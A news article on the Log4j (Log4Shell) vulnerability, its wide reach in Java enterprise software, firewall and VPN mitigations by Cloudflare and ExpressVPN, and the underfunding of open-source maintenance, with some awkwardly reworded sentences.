Latest News And Breaking Headlines

Log4j has been patched, but the exploits are just getting started

Peter Membrey, chief architect of ExpressVPN, vividly recalls seeing the news about the Log4j vulnerability online.

“Once I saw how you could exploit it, it was horrifying,” Membrey says. “If one of those disaster movies that features a nuclear power plant, they notice it’s going to melt, but they can’t stop it. You know what’s coming, but there are very limited things you can do.”

Since the vulnerability was discovered last week, the cybersecurity world has accelerated to identify vulnerable applications, detect potential attacks and mitigate exploits, however possible. Nevertheless, serious hacks that take advantage of the exploit are almost certain.

So far, researchers have observed attackers use the Log4j vulnerability to install ransomware on honeypot servers — machines that have been deliberately made vulnerable to detect new threats. A cybersecurity company reported that: almost half of corporate networks it was monitoring had seen attempts to exploit the vulnerability. The CEO of Cloudflare, a website and network security provider, announced early that the threat was so great that the company would roll out firewall protection to all customers, including those who had not paid for it. But concrete news about exploitation in the wild remains scarce, probably because victims do not know or are not yet willing to publicly acknowledge that their systems have been hacked.

What is it is certain that the magnitude of the vulnerability is enormous. A list of affected software, compiled by the Cybersecurity and Infrastructure Security Agency (CISA) — and limited to enterprise software platforms only — runs to over 500 items long at the time of going to press. A list of all affected applications would undoubtedly add up to many thousands more.

Some of the names on the list will be known to the public (Amazon, IBM, Microsoft), but some of the most alarming problems have come with software that remains behind the scenes. Manufacturers such as Broadcom, Red Hat and VMware create software that enterprise customers build businesses on top of, effectively spreading the vulnerability at a core infrastructure level of many companies. This makes the process of identifying and eliminating vulnerabilities all the more difficult, even after a patch for the affected library has been released.

Even by the standards of high-profile vulnerabilities, Log4Shell reaches an unusually large portion of the Internet. It is a reflection of the fact that the Java programming language is widely used in business software, and for Java software, the Log4j library is extremely common.

“I ran searches of our database to see every customer using Log4j in one of their applications,” said Jeremy Katz, co-founder of Tidelift, a company that helps other organizations manage dependencies on open source software. “And the answer was: each of them has applications written in Java.”

The discovery of an easily exploitable bug in a primarily business-oriented language is part of what analysts call a “almost perfect storm” around the Log4j vulnerability. Any company could use multiple programs containing the vulnerable library – in some cases with multiple versions within one application.

“Java has been around for so many years and is used so heavily within companies, especially large ones,” said Cloudflare CTO John Graham-Cumming. “This is a big moment for people who manage software within companies, and they will go through updates and fixes as soon as possible.”

Given the circumstances, “as fast as they can” is a very subjective term. Software updates for organizations such as banks, hospitals, or government agencies are generally performed on the scale of weeks and months, not days; Typically, updates require different levels of development, authorization, and testing before making their way into a live application.

In the meantime, mitigations that can be pushed out fast provide a critical intermediate step, saving valuable time as businesses large and small alike scramble to identify vulnerabilities and deploy updates. That’s where network-layer fixes play a key role: Since malware programs communicate with their operators over the Internet, measures that restrict inbound and outbound web traffic can provide a workaround to mitigate the exploit’s effects.

Cloudflare was an organization that moved quickly, Graham-Cumming explained, add new rules for the firewall which blocked HTTP requests containing strings characteristic of the Log4j attack code. ExpressVPN too modified his product to protect against Log4Shell, updating VPN rules to automatically block all outgoing traffic on ports used by LDAP — a protocol that the exploit uses to retrieve resources from external URLs and download them to a vulnerable machine.

“If a customer gets infected, we’ve already seen scanners as a malicious payload, so they can start scanning the internet and infect other people,” Membrey says. “We wanted to put a limit on that, not just for the sake of our customers, but for everyone — kind of like with Covid and vaccines.”

These changes usually happen faster because they happen on firewall or VPN company servers and require little (if any) action from the end user. In other words, an outdated software application could still get a decent level of protection from an updated VPN, although it’s no substitute for proper patching.

Unfortunately, given the severity of the vulnerability, some systems will be compromised even if quick fixes are implemented. And it can take a long time – even years – for the effects to be fully felt.

“Advanced attackers will exploit the vulnerability, set up a persistence mechanism, and then be misled,” said Daniel Clayton, vice president of global cybersecurity services at Bitdefender. “In two years we will hear about major breaches and then learn that they were breached two years ago.”

The bug in Log4j emphasizes once again the need and challenge to adequately fund open source projects. (A vast amount of tech infrastructure might as well depend on “a project that any random person in Nebraska has tirelessly maintained since 2003” as a eternally relevant XKCD comic explains.) Bloomberg reported earlier this week that many of the developers involved in the race to develop a patch for the Log4j library were unpaid volunteers, despite the software’s global use in business applications.

One of the last vulnerabilities to shake the internet, Heartbleed, was similarly caused by a bug in a widely used open source library, OpenSSL. After that bug, tech companies like Google, Microsoft and Facebook pledged to increase their funding for open source projects that were critical to the Internet’s infrastructure. But in the wake of the Log4j fallout, it’s clear that dependency management remains a serious security problem – and one we’re not close to solving.

“If you look at most of the big hacks that have happened over the years, it’s normally not something very sophisticated that big companies undo,” Clayton says. “It’s something that hasn’t been patched.”

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More